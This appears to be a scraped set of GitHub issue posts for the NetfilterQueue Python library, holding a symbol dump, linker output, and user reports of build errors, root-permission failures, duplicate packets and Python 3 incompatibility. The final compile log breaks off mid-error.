00013a80 b __pyx_int_130
00013a84 b __pyx_int_131
00013a88 b __pyx_int_132
00013a8c b __pyx_int_133
00013a90 b __pyx_int_134
00013a94 b __pyx_int_135
00013a98 b __pyx_int_136
00013a9c b __pyx_int_137
00013aa0 b __pyx_int_138
00013aa4 b __pyx_int_139
000138b0 b __pyx_int_14
00013aa8 b __pyx_int_140
000138b4 b __pyx_int_15
000138b8 b __pyx_int_16
000138bc b __pyx_int_17
000138c0 b __pyx_int_18
000138c4 b __pyx_int_19
00013880 b __pyx_int_2
000138c8 b __pyx_int_20
000138cc b __pyx_int_21
000138d0 b __pyx_int_22
000138d4 b __pyx_int_23
000138d8 b __pyx_int_24
000138dc b __pyx_int_25
00013aac b __pyx_int_255
000138e0 b __pyx_int_26
000138e4 b __pyx_int_27
000138e8 b __pyx_int_28
000138ec b __pyx_int_29
00013884 b __pyx_int_3
000138f0 b __pyx_int_30
000138f4 b __pyx_int_31
000138f8 b __pyx_int_32
000138fc b __pyx_int_33
00013900 b __pyx_int_34
00013904 b __pyx_int_35
00013908 b __pyx_int_36
0001390c b __pyx_int_37
00013910 b __pyx_int_38
00013914 b __pyx_int_39
00013888 b __pyx_int_4
00013918 b __pyx_int_40
00013ab0 b __pyx_int_4096
0001391c b __pyx_int_41
00013920 b __pyx_int_42
00013924 b __pyx_int_43
00013928 b __pyx_int_44
0001392c b __pyx_int_45
00013930 b __pyx_int_46
00013934 b __pyx_int_47
00013938 b __pyx_int_48
0001393c b __pyx_int_49
0001388c b __pyx_int_5
00013940 b __pyx_int_50
00013944 b __pyx_int_51
00013948 b __pyx_int_52
0001394c b __pyx_int_53
00013950 b __pyx_int_54
00013954 b __pyx_int_55
00013958 b __pyx_int_56
0001395c b __pyx_int_57
00013960 b __pyx_int_58
00013964 b __pyx_int_59
00013890 b __pyx_int_6
00013968 b __pyx_int_60
0001396c b __pyx_int_61
00013970 b __pyx_int_62
00013974 b __pyx_int_63
00013978 b __pyx_int_64
0001397c b __pyx_int_65
00013980 b __pyx_int_66
00013984 b __pyx_int_67
00013988 b __pyx_int_68
0001398c b __pyx_int_69
00013894 b __pyx_int_7
00013990 b __pyx_int_70
00013994 b __pyx_int_71
00013998 b __pyx_int_72
0001399c b __pyx_int_73
000139a0 b __pyx_int_74
000139a4 b __pyx_int_75
000139a8 b __pyx_int_76
000139ac b __pyx_int_77
000139b0 b __pyx_int_78
000139b4 b __pyx_int_79
00013898 b __pyx_int_8
000139b8 b __pyx_int_80
000139bc b __pyx_int_81
000139c0 b __pyx_int_82
000139c4 b __pyx_int_83
000139c8 b __pyx_int_84
000139cc b __pyx_int_85
000139d0 b __pyx_int_86
000139d4 b __pyx_int_87
000139d8 b __pyx_int_88
000139dc b __pyx_int_89
0001389c b __pyx_int_9
000139e0 b __pyx_int_90
000139e4 b __pyx_int_91
000139e8 b __pyx_int_92
000139ec b __pyx_int_93
000139f0 b __pyx_int_94
000139f4 b __pyx_int_95
000139f8 b __pyx_int_96
000139fc b __pyx_int_97
00013a00 b __pyx_int_98
00013a04 b __pyx_int_99
00010906 r __pyx_k_3PC
0001090a r __pyx_k_AH
0001090d r __pyx_k_ARGUS
00010913 r __pyx_k_ARIS
00010918 r __pyx_k_AX_25
0001091e r __pyx_k_A_N
00010922 r __pyx_k_BBN_RCC_MON
0001092e r __pyx_k_BNA
00010932 r __pyx_k_BR_SAT_MON
00010860 r __pyx_k_Bind_to_a_Linux_netfilter_queue
0001093d r __pyx_k_CBT
00010941 r __pyx_k_CFTP
00010946 r __pyx_k_CHAOS
0001094c r __pyx_k_COPY_META
00010956 r __pyx_k_COPY_NONE
00010960 r __pyx_k_COPY_PACKET
0001096c r __pyx_k_CPHB
00010971 r __pyx_k_CPNX
00010976 r __pyx_k_CRTP
0001097b r __pyx_k_CRUDP
00010981 r __pyx_k_Compaq_Peer
0001098d r __pyx_k_DCCP
00010992 r __pyx_k_DCN_MEAS
0001099b r __pyx_k_DDP
0001099f r __pyx_k_DDX
000109a3 r __pyx_k_DGP
000109a7 r __pyx_k_DSR
000109ab r __pyx_k_EGP
000109af r __pyx_k_EIGRP
000109b5 r __pyx_k_EMCON
000109bb r __pyx_k_ENCAP
000109c1 r __pyx_k_ESP
000109c5 r __pyx_k_ETHERIP
000109cd r __pyx_k_FC
000109d0 r __pyx_k_FIRE
000109e0 r __pyx_k_Failed_to_bind_family_s_Are_you
00010a08 r __pyx_k_Failed_to_create_queue_s
00010a40 r __pyx_k_Failed_to_get_payload_of_packet
00010a61 r __pyx_k_Failed_to_open_NFQueue
00010a80 r __pyx_k_Failed_to_set_packet_copy_mode
00010aa0 r __pyx_k_GGP
00010aa4 r __pyx_k_GMTP
00010aa9 r __pyx_k_GRE
00010aad r __pyx_k_HIP
00010ab1 r __pyx_k_HMP
00010ab5 r __pyx_k_HOPOPT
00010abc r __pyx_k_IATP
00010ac1 r __pyx_k_ICMP
00010ac6 r __pyx_k_IDPR
00010acb r __pyx_k_IDPR_CMTP
00010ad5 r __pyx_k_IDRP
00010ada r __pyx_k_IFMP
00010adf r __pyx_k_IGMP
00010ae4 r __pyx_k_IGP
00010ae8 r __pyx_k_IL
00010aeb r __pyx_k_IP
00010aee r __pyx_k_IPCV
00010af3 r __pyx_k_IPComp
00010afa r __pyx_k_IPIP
00010aff r __pyx_k_IPLT
00010b04 r __pyx_k_IPPC
00010b09 r __pyx_k_IPX_in_IP
00010b13 r __pyx_k_IPv6
00010b18 r __pyx_k_IPv6_Frag
00010b22 r __pyx_k_IPv6_ICMP
00010b2c r __pyx_k_IPv6_NoNxt
00010b37 r __pyx_k_IPv6_Opts
00010b41 r __pyx_k_IPv6_Route
00010b4c r __pyx_k_IRTP
00010b51 r __pyx_k_ISIS
00010b56 r __pyx_k_ISO_IP
00010b5d r __pyx_k_ISO_TP4
00010b65 r __pyx_k_I_NLSP
00010b6c r __pyx_k_KRYPTOLAN
00010b76 r __pyx_k_L2TP
00010b7b r __pyx_k_LARP
00010b80 r __pyx_k_LEAF_1
00010b87 r __pyx_k_LEAF_2
00010b8e r __pyx_k_MERIT_INP
00010b98 r __pyx_k_MFE_NSP
00010ba0 r __pyx_k_MICP
00010ba5 r __pyx_k_MOBILE
00010bac r __pyx_k_MPLS_in_IP
00010bb7 r __pyx_k_MTP
00010bbb r __pyx_k_MUX
00010bbf r __pyx_k_Mobility
00010bc8 r __pyx_k_NARP
00010bcd r __pyx_k_NETBLT
00010bd4 r __pyx_k_NSFNET_IGP
00010bdf r __pyx_k_NVP_II
00010be6 r __pyx_k_OSError
00010bee r __pyx_k_OSPFIGP
00010bf6 r __pyx_k_PGM
00010bfa r __pyx_k_PIM
00010bfe r __pyx_k_PIPE
00010c03 r __pyx_k_PNNI
00010c08 r __pyx_k_PRM
00010c0c r __pyx_k_PROTOCOLS
00010c16 r __pyx_k_PTP
00010c1a r __pyx_k_PUP
00010c1e r __pyx_k_PVP
00010c22 r __pyx_k_QNX
00010c26 r __pyx_k_RDP
00010c2a r __pyx_k_RSVP
00010c2f r __pyx_k_RSVP_E2E_IGNORE
00010c3f r __pyx_k_RVD
00010c43 r __pyx_k_Reserved
00010c4c r __pyx_k_RuntimeWarning
00010c5b r __pyx_k_SAT_EXPAK
00010c65 r __pyx_k_SAT_MON
00010c6d r __pyx_k_SCC_SP
00010c74 r __pyx_k_SCPS
00010c79 r __pyx_k_SCTP
00010c7e r __pyx_k_SDRP
00010c83 r __pyx_k_SECURE_VMTP
00010c8f r __pyx_k_SKIP
00010c94 r __pyx_k_SM
00010c97 r __pyx_k_SMP
00010c9b r __pyx_k_SNP
00010c9f r __pyx_k_SPS
00010ca3 r __pyx_k_SRP
00010ca7 r __pyx_k_SSCOPMCE
00010cb0 r __pyx_k_ST
00010cb3 r __pyx_k_STP
00010cb7 r __pyx_k_SUN_ND
00010cbe r __pyx_k_SWIPE
00010cc4 r __pyx_k_Shim6
00010ce0 r __pyx_k_Socket_rcvbuf_limit_is_now_d_req
00010d0d r __pyx_k_Sprite_RPC
00010d18 r __pyx_k_TCF
00010d1c r __pyx_k_TCP
00010d20 r __pyx_k_TLSP
00010d25 r __pyx_k_TP
00010d2a r __pyx_k_TRUNK_1
00010d32 r __pyx_k_TRUNK_2
00010d3a r __pyx_k_TTP
00010d3e r __pyx_k_UDP
00010d42 r __pyx_k_UDPLite
00010d4a r __pyx_k_UTI
00010d4e r __pyx_k_Unknown_protocol
00010d5f r __pyx_k_VERSION
00010d67 r __pyx_k_VINES
00010d6d r __pyx_k_VISA
00010d72 r __pyx_k_VMTP
00010d77 r __pyx_k_VRRP
00010d80 r __pyx_k_Verdict_already_given_for_this_p
00010da7 r __pyx_k_WB_EXPAK
00010db0 r __pyx_k_WB_MON
00010db7 r __pyx_k_WSN
00010dbb r __pyx_k_XNET
00010dc0 r __pyx_k_XNS_IDP
00010dc8 r __pyx_k_XTP
00013ab4 b __pyx_k__4
00010dcc r __pyx_k_accept
00010dd3 r __pyx_k_af
00010dd6 r __pyx_k_any_0_hop_protocol
00010de9 r __pyx_k_any_distributed_file_system
00010e05 r __pyx_k_any_host_internal_protocol
00010e20 r __pyx_k_any_local_network
00010e32 r __pyx_k_any_private_encryption_scheme
00010e50 r __pyx_k_args
00010e55 r __pyx_k_block
00010e5b r __pyx_k_drop
00010e60 r __pyx_k_error
00010e66 r __pyx_k_get
00010e6a r __pyx_k_get_fd
00010e71 r __pyx_k_get_mark
00010e7a r __pyx_k_get_payload_len
00010e8a r __pyx_k_get_timestamp
00010e98 r __pyx_k_import
00010ea3 r __pyx_k_main
00010eac r __pyx_k_manet
00010eb2 r __pyx_k_max_len
00010eba r __pyx_k_mode
00010ebf r __pyx_k_pyx_vtable
00010ece r __pyx_k_queue_num
00010ed8 r __pyx_k_range
00010ede r __pyx_k_recv
00010ee3 r __pyx_k_repeat
00010eea r __pyx_k_s_packet_s_bytes
00010efe r __pyx_k_set_mark
00010f07 r __pyx_k_set_payload
00010f13 r __pyx_k_sock_len
00010f1c r __pyx_k_socket
00010f23 r __pyx_k_test
00010f2c r __pyx_k_user_callback
00013598 b __pyx_kp_s_3PC
000135a8 b __pyx_kp_s_AX_25
000135ac b __pyx_kp_s_A_N
000135b0 b __pyx_kp_s_BBN_RCC_MON
000135b8 b __pyx_kp_s_BR_SAT_MON
000135e4 b __pyx_kp_s_Compaq_Peer
000135ec b __pyx_kp_s_DCN_MEAS
00013620 b __pyx_kp_s_Failed_to_bind_family_s_Are_you
00013624 b __pyx_kp_s_Failed_to_create_queue_s
00013628 b __pyx_kp_s_Failed_to_get_payload_of_packet
0001362c b __pyx_kp_s_Failed_to_open_NFQueue
00013630 b __pyx_kp_s_Failed_to_set_packet_copy_mode
00013658 b __pyx_kp_s_IDPR_CMTP
00013688 b __pyx_kp_s_IPX_in_IP
00013690 b __pyx_kp_s_IPv6_Frag
00013694 b __pyx_kp_s_IPv6_ICMP
00013698 b __pyx_kp_s_IPv6_NoNxt
0001369c b __pyx_kp_s_IPv6_Opts
000136a0 b __pyx_kp_s_IPv6_Route
000136ac b __pyx_kp_s_ISO_IP
000136b0 b __pyx_kp_s_ISO_TP4
000136b4 b __pyx_kp_s_I_NLSP
000136c4 b __pyx_kp_s_LEAF_1
000136c8 b __pyx_kp_s_LEAF_2
000136cc b __pyx_kp_s_MERIT_INP
000136d0 b __pyx_kp_s_MFE_NSP
000136dc b __pyx_kp_s_MPLS_in_IP
000136f4 b __pyx_kp_s_NSFNET_IGP
000136f8 b __pyx_kp_s_NVP_II
00013734 b __pyx_kp_s_RSVP_E2E_IGNORE
00013744 b __pyx_kp_s_SAT_EXPAK
00013748 b __pyx_kp_s_SAT_MON
0001374c b __pyx_kp_s_SCC_SP
0001375c b __pyx_kp_s_SECURE_VMTP
00013784 b __pyx_kp_s_SUN_ND
00013790 b __pyx_kp_s_Socket_rcvbuf_limit_is_now_d_req
00013794 b __pyx_kp_s_Sprite_RPC
000137a4 b __pyx_kp_s_TP
000137a8 b __pyx_kp_s_TRUNK_1
000137ac b __pyx_kp_s_TRUNK_2
000137c0 b __pyx_kp_s_Unknown_protocol
000137d8 b __pyx_kp_s_Verdict_already_given_for_this_p
000137dc b __pyx_kp_s_WB_EXPAK
000137e0 b __pyx_kp_s_WB_MON
000137ec b __pyx_kp_s_XNS_IDP
000137fc b __pyx_kp_s_any_0_hop_protocol
00013800 b __pyx_kp_s_any_distributed_file_system
00013804 b __pyx_kp_s_any_host_internal_protocol
00013808 b __pyx_kp_s_any_local_network
0001380c b __pyx_kp_s_any_private_encryption_scheme
0001385c b __pyx_kp_s_s_packet_s_bytes
00013584 b __pyx_lineno
0001356c b __pyx_m
00013548 b __pyx_methods
000134c0 d __pyx_methods_14netfilterqueue_NetfilterQueue
000133a0 d __pyx_methods_14netfilterqueue_Packet
00013540 B __pyx_module_is_main_netfilterqueue
0001359c b __pyx_n_s_AH
000135a0 b __pyx_n_s_ARGUS
000135a4 b __pyx_n_s_ARIS
000135b4 b __pyx_n_s_BNA
000135bc b __pyx_n_s_CBT
000135c0 b __pyx_n_s_CFTP
000135c4 b __pyx_n_s_CHAOS
000135c8 b __pyx_n_s_COPY_META
000135cc b __pyx_n_s_COPY_NONE
000135d0 b __pyx_n_s_COPY_PACKET
000135d4 b __pyx_n_s_CPHB
000135d8 b __pyx_n_s_CPNX
000135dc b __pyx_n_s_CRTP
000135e0 b __pyx_n_s_CRUDP
000135e8 b __pyx_n_s_DCCP
000135f0 b __pyx_n_s_DDP
000135f4 b __pyx_n_s_DDX
000135f8 b __pyx_n_s_DGP
000135fc b __pyx_n_s_DSR
00013600 b __pyx_n_s_EGP
00013604 b __pyx_n_s_EIGRP
00013608 b __pyx_n_s_EMCON
0001360c b __pyx_n_s_ENCAP
00013610 b __pyx_n_s_ESP
00013614 b __pyx_n_s_ETHERIP
00013618 b __pyx_n_s_FC
0001361c b __pyx_n_s_FIRE
00013634 b __pyx_n_s_GGP
00013638 b __pyx_n_s_GMTP
0001363c b __pyx_n_s_GRE
00013640 b __pyx_n_s_HIP
00013644 b __pyx_n_s_HMP
00013648 b __pyx_n_s_HOPOPT
0001364c b __pyx_n_s_IATP
00013650 b __pyx_n_s_ICMP
00013654 b __pyx_n_s_IDPR
0001365c b __pyx_n_s_IDRP
00013660 b __pyx_n_s_IFMP
00013664 b __pyx_n_s_IGMP
00013668 b __pyx_n_s_IGP
0001366c b __pyx_n_s_IL
00013670 b __pyx_n_s_IP
00013674 b __pyx_n_s_IPCV
00013678 b __pyx_n_s_IPComp
0001367c b __pyx_n_s_IPIP
00013680 b __pyx_n_s_IPLT
00013684 b __pyx_n_s_IPPC
0001368c b __pyx_n_s_IPv6
000136a4 b __pyx_n_s_IRTP
000136a8 b __pyx_n_s_ISIS
000136b8 b __pyx_n_s_KRYPTOLAN
000136bc b __pyx_n_s_L2TP
000136c0 b __pyx_n_s_LARP
000136d4 b __pyx_n_s_MICP
000136d8 b __pyx_n_s_MOBILE
000136e0 b __pyx_n_s_MTP
000136e4 b __pyx_n_s_MUX
000136e8 b __pyx_n_s_Mobility
000136ec b __pyx_n_s_NARP
000136f0 b __pyx_n_s_NETBLT
000136fc b __pyx_n_s_OSError
00013700 b __pyx_n_s_OSPFIGP
00013704 b __pyx_n_s_PGM
00013708 b __pyx_n_s_PIM
0001370c b __pyx_n_s_PIPE
00013710 b __pyx_n_s_PNNI
00013714 b __pyx_n_s_PRM
00013718 b __pyx_n_s_PROTOCOLS
0001371c b __pyx_n_s_PTP
00013720 b __pyx_n_s_PUP
00013724 b __pyx_n_s_PVP
00013728 b __pyx_n_s_QNX
0001372c b __pyx_n_s_RDP
00013730 b __pyx_n_s_RSVP
00013738 b __pyx_n_s_RVD
0001373c b __pyx_n_s_Reserved
00013740 b __pyx_n_s_RuntimeWarning
00013750 b __pyx_n_s_SCPS
00013754 b __pyx_n_s_SCTP
00013758 b __pyx_n_s_SDRP
00013760 b __pyx_n_s_SKIP
00013764 b __pyx_n_s_SM
00013768 b __pyx_n_s_SMP
0001376c b __pyx_n_s_SNP
00013770 b __pyx_n_s_SPS
00013774 b __pyx_n_s_SRP
00013778 b __pyx_n_s_SSCOPMCE
0001377c b __pyx_n_s_ST
00013780 b __pyx_n_s_STP
00013788 b __pyx_n_s_SWIPE
0001378c b __pyx_n_s_Shim6
00013798 b __pyx_n_s_TCF
0001379c b __pyx_n_s_TCP
000137a0 b __pyx_n_s_TLSP
000137b0 b __pyx_n_s_TTP
000137b4 b __pyx_n_s_UDP
000137b8 b __pyx_n_s_UDPLite
000137bc b __pyx_n_s_UTI
000137c4 b __pyx_n_s_VERSION
000137c8 b __pyx_n_s_VINES
000137cc b __pyx_n_s_VISA
000137d0 b __pyx_n_s_VMTP
000137d4 b __pyx_n_s_VRRP
000137e4 b __pyx_n_s_WSN
000137e8 b __pyx_n_s_XNET
000137f0 b __pyx_n_s_XTP
000137f4 b __pyx_n_s_accept
000137f8 b __pyx_n_s_af
00013810 b __pyx_n_s_args
00013814 b __pyx_n_s_block
00013818 b __pyx_n_s_drop
0001381c b __pyx_n_s_error
00013820 b __pyx_n_s_get
00013824 b __pyx_n_s_get_fd
00013828 b __pyx_n_s_get_mark
0001382c b __pyx_n_s_get_payload_len
00013830 b __pyx_n_s_get_timestamp
00013834 b __pyx_n_s_import
00013838 b __pyx_n_s_main
0001383c b __pyx_n_s_manet
00013840 b __pyx_n_s_max_len
00013844 b __pyx_n_s_mode
00013848 b __pyx_n_s_pyx_vtable
0001384c b __pyx_n_s_queue_num
00013850 b __pyx_n_s_range
00013854 b __pyx_n_s_recv
00013858 b __pyx_n_s_repeat
00013860 b __pyx_n_s_set_mark
00013864 b __pyx_n_s_set_payload
00013868 b __pyx_n_s_sock_len
0001386c b __pyx_n_s_socket
00013870 b __pyx_n_s_test
00013874 b __pyx_n_s_user_callback
0000ca70 t __pyx_pf_14netfilterqueue_14NetfilterQueue_10run
0001355c b __pyx_ptype_14netfilterqueue_NetfilterQueue
00013558 b __pyx_ptype_14netfilterqueue_Packet
0000d100 t __pyx_pw_14netfilterqueue_14NetfilterQueue_11run
0000e080 t __pyx_pw_14netfilterqueue_14NetfilterQueue_13run_socket
0000d2b0 t __pyx_pw_14netfilterqueue_14NetfilterQueue_5bind
000036a0 t __pyx_pw_14netfilterqueue_14NetfilterQueue_7unbind
00003df0 t __pyx_pw_14netfilterqueue_14NetfilterQueue_9get_fd
00005d30 t __pyx_pw_14netfilterqueue_6Packet_11set_payload
00006db0 t __pyx_pw_14netfilterqueue_6Packet_13set_mark
00005630 t __pyx_pw_14netfilterqueue_6Packet_15get_mark
000052f0 t __pyx_pw_14netfilterqueue_6Packet_17accept
00005020 t __pyx_pw_14netfilterqueue_6Packet_19drop
00004d50 t __pyx_pw_14netfilterqueue_6Packet_21repeat
0000f030 t __pyx_pw_14netfilterqueue_6Packet_3__str

000040f0 t __pyx_pw_14netfilterqueue_6Packet_5get_payload
000062c0 t __pyx_pw_14netfilterqueue_6Packet_7get_payload_len
00006670 t __pyx_pw_14netfilterqueue_6Packet_9get_timestamp
000124ec d __pyx_pyargnames.15863
000124e4 d __pyx_pyargnames.16268
00012520 d __pyx_string_tab
000031b0 t __pyx_tp_clear_14netfilterqueue_NetfilterQueue
00003950 t __pyx_tp_dealloc_14netfilterqueue_NetfilterQueue
00003120 t __pyx_tp_dealloc_14netfilterqueue_Packet
00006700 t __pyx_tp_new_14netfilterqueue_NetfilterQueue
00003330 t __pyx_tp_new_14netfilterqueue_Packet
00003160 t __pyx_tp_traverse_14netfilterqueue_NetfilterQueue
00013ab8 b _pyx_tuple
00013abc b __pyx_tuple__2
00013ac0 b __pyx_tuple__3
00013ac4 b __pyx_tuple__5
00013ac8 b __pyx_tuple__6
00013acc b __pyx_tuple__7
00012420 d __pyx_type_14netfilterqueue_NetfilterQueue
00012340 d __pyx_type_14netfilterqueue_Packet
00013ae0 b __pyx_vtable_14netfilterqueue_Packet
0001358c b __pyx_vtabptr_14netfilterqueue_Packet
U __stack_chk_fail@@GLIBC_2.4
0000ff10 t __stack_chk_fail_local
00013520 A _edata
00013b08 A _end
0000ff68 T _fini
00002a60 T _init
00013520 b completed.7021
00013524 b dtor_idx.7023
000030e0 t frame_dummy
00006fb0 T initnetfilterqueue
U nfnl_rcvbufsiz
U nfq_bind_pf
U nfq_close
U nfq_create_queue
U nfq_destroy_queue
U nfq_fd
U nfq_get_msg_packet_hdr
U nfq_get_nfmark
U nfq_get_payload
U nfq_get_timestamp
U nfq_handle_packet
U nfq_nfnlh
U nfq_open
U nfq_set_mode
U nfq_set_queue_maxlen
U nfq_set_verdict
U nfq_set_verdict2
U nfq_unbind_pf
U recv@@GLIBC_2.0

3.If I executedldd /usr/local/lib/python2.6/dist-packages/netfilterqueue.so , I would get:

linux-gate.so.1 => (0xb77b8000)
libnetfilter_queue.so.1 => /usr/lib/libnetfilter_queue.so.1 (0xb7790000)
libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0 (0xb7777000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7614000)
libnfnetlink.so.0 => /usr/lib/libnfnetlink.so.0 (0xb760c000)
/lib/ld-linux.so.2 (0xb77b9000)

4.the warming when executing sudo pip install netfilterqueue --upgrade

DEPRECATION: Python 2.6 is no longer supported by the Python core team, please upgrade your Python. A future version of pip will drop support for Python 2.6
The directory '/home/ubuntu/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/ubuntu/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
/usr/local/lib/python2.6/dist-packages/pip/vendor/requests/packages/urllib3/util/ssl.py:318: SNIMissingWarning: An HTTPS request has been made, but the SNI (Subject Name Indication) extension to TLS is not available on this platform. This may cause the server to present an incorrect TLS certificate, which can cause validation failures. You can upgrade to a newer version of Python to solve this. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#snimissingwarning.
SNIMissingWarning
/usr/local/lib/python2.6/dist-packages/pip/vendor/requests/packages/urllib3/util/ssl.py:122: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. You can upgrade to a newer version of Python to solve this. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.
InsecurePlatformWarning
Requirement already up-to-date: netfilterqueue in /usr/local/lib/python2.6/dist-packages

packet.set_payload() implementation

Hallo, many tanks for your work. I would ask you to implement the "packet.set_payload()" function. It will be very usefull for all python programmer community.
Best regards.
yousdo

bind callback is not work

hi guys i want to make a packet queue with this simple code :


from netfilterqueue import NetfilterQueue

def print_and_accept(pkt):
    print(pkt)


nfqueue = NetfilterQueue()
nfqueue.bind(0, print_and_accept)

but
"print_and_accept" is not fire and work !
program doesnt print packet and internet is worked well !
how ?
and how can fix it

installation - Windows 10

$ python setup.py install
running install
running build
running build_ext
building 'netfilterqueue' extension
creating build
creating build\temp.win32-3.6
creating build\temp.win32-3.6\Release
C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\BIN\cl.exe /c /nologo /Ox                                                 /W3 /GL /DNDEBUG /MD -IC:\Users\Fetah\AppData\Local\Programs\Python\Python36-32                                                \include -IC:\Users\Fetah\AppData\Local\Programs\Python\Python36-32\include "-IC                                                :\Program Files (x86)\Microsoft Visual Studio 14.0\VC\INCLUDE" "-IC:\Program Fil                                                es (x86)\Windows Kits\10\include\10.0.10240.0\ucrt" "-IC:\Program Files (x86)\Wi                                                ndows Kits\8.1\include\shared" "-IC:\Program Files (x86)\Windows Kits\8.1\includ                                                e\um" "-IC:\Program Files (x86)\Windows Kits\8.1\include\winrt" /Tcnetfilterqueu                                                e.c /Fobuild\temp.win32-3.6\Release\netfilterqueue.obj
netfilterqueue.c
netfilterqueue.c(434): fatal error C1083: Cannot open include file: 'netinet/ip.                                                h': No such file or directory
error: command 'C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\BIN\\                                                cl.exe' failed with exit status 2

OSError: Failed to bind family 2. Are you root?

VirtialBox-ubuntu

/home/pengb/Desktop/cateDataDemo/venv/bin/python /home/pengb/Desktop/cateDataDemo/test1.py
Traceback (most recent call last):
  File "/home/pengb/Desktop/cateDataDemo/test1.py", line 7, in <module>
    nffrqueue = NetfilterQueue()
  File "netfilterqueue.pyx", line 162, in netfilterqueue.NetfilterQueue.__cinit__ (netfilterqueue.c:4098)
OSError: Failed to bind family 2. Are you root?

Process finished with exit code 1

Add instructions for contributing

In particular, document updating the .c files. Everyone so far seems smart enough to figure this out on their own, but I can't remember it.

Python3 Output

Is anyone still maintaining this project? Got it working great on python 3 for INPUT, very little latency. Broadband running at 70mbps dl, 18mbps ul, almost full speed. However, on OUTPUT, there is a long delay before anything happens, and then the best I can get is 4mbps dl, 3mbps ul. This is running example code. Anyone have any ideas? Anyone still reading these? Appears to be the same for me with python 2 as well.

The same packet is being caught twice

The mode method is being called twice one when the packet is being pushed into the NFQUEUE and once when the packet is accepted.

For example is the 'mode' is a simple print method I will get two:

ICMP packet, 84 bytes
ICMP packet, 84 bytes

From a single ping run with:

ping 127.0.0.1 -c 1

Incompatable Python3.7

Hi,

multiple errors when building with python3. Either python3 setup.py install or pip3 install NetfilterQueue. Can you guide on how to contribute and build this by compiling with a more recent Cython?

gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -I/usr/local/include/python3.7m -c netfilterqueue.c -o build/temp.linux-x86_64-3.7/netfilterqueue.o netfilterqueue.c: In function ‘__pyx_f_14netfilterqueue_6Packet_set_nfq_data’: netfilterqueue.c:2248:67: warning: passing argument 2 of ‘nfq_get_payload’ from incompatible pointer type [-Wincompatible-pointer-types] __pyx_v_self->payload_len = nfq_get_payload(__pyx_v_self->_nfa, (&__pyx_v_self->payload)); ^ In file included from netfilterqueue.c:490:0: /usr/include/libnetfilter_queue/libnetfilter_queue.h:119:12: note: expected ‘unsigned char **’ but argument is of type ‘char **’ extern int nfq_get_payload(struct nfq_data *nfad, unsigned char **data); ^~~~~~~~~~~~~~~ netfilterqueue.c: In function ‘__pyx_pf_14netfilterqueue_6Packet_4get_hw’: netfilterqueue.c:2631:17: warning: implicit declaration of function ‘PyString_FromStringAndSize’; did you mean ‘PyBytes_FromStringAndSize’? [-Wimplicit-function-declaration] __pyx_t_3 = PyString_FromStringAndSize(((char *)__pyx_v_self->hw_addr), 8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error) ^~~~~~~~~~~~~~~~~~~~~~~~~~ PyBytes_FromStringAndSize netfilterqueue.c:2631:15: warning: assignment makes pointer from integer without a cast [-Wint-conversion] __pyx_t_3 = PyString_FromStringAndSize(((char *)__pyx_v_self->hw_addr), 8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error) ^ netfilterqueue.c: In function ‘__Pyx__ExceptionSave’: netfilterqueue.c:7520:21: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_type’; did you mean ‘curexc_type’? *type = tstate->exc_type; ^~~~~~~~ curexc_type netfilterqueue.c:7521:22: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_value’; did you mean ‘curexc_value’? *value = tstate->exc_value; ^~~~~~~~~ curexc_value netfilterqueue.c:7522:19: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’? *tb = tstate->exc_traceback; ^~~~~~~~~~~~~ curexc_traceback netfilterqueue.c: In function ‘__Pyx__ExceptionReset’: netfilterqueue.c:7529:24: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_type’; did you mean ‘curexc_type’? tmp_type = tstate->exc_type; ^~~~~~~~ curexc_type netfilterqueue.c:7530:25: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_value’; did you mean ‘curexc_value’? tmp_value = tstate->exc_value; ^~~~~~~~~ curexc_value netfilterqueue.c:7531:22: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’? tmp_tb = tstate->exc_traceback; ^~~~~~~~~~~~~ curexc_traceback netfilterqueue.c:7532:13: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_type’; did you mean ‘curexc_type’? tstate->exc_type = type; ^~~~~~~~ curexc_type netfilterqueue.c:7533:13: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_value’; did you mean ‘curexc_value’? tstate->exc_value = value; ^~~~~~~~~ curexc_value netfilterqueue.c:7534:13: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’? tstate->exc_traceback = tb; ^~~~~~~~~~~~~ curexc_traceback netfilterqueue.c: In function ‘__Pyx__GetException’: netfilterqueue.c:7589:24: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_type’; did you mean ‘curexc_type’? tmp_type = tstate->exc_type; ^~~~~~~~ curexc_type netfilterqueue.c:7590:25: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_value’; did you mean ‘curexc_value’? tmp_value = tstate->exc_value; ^~~~~~~~~ curexc_value netfilterqueue.c:7591:22: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’? tmp_tb = tstate->exc_traceback; ^~~~~~~~~~~~~ curexc_traceback netfilterqueue.c:7592:13: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_type’; did you mean ‘curexc_type’? tstate->exc_type = local_type; ^~~~~~~~ curexc_type netfilterqueue.c:7593:13: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_value’; did you mean ‘curexc_value’? 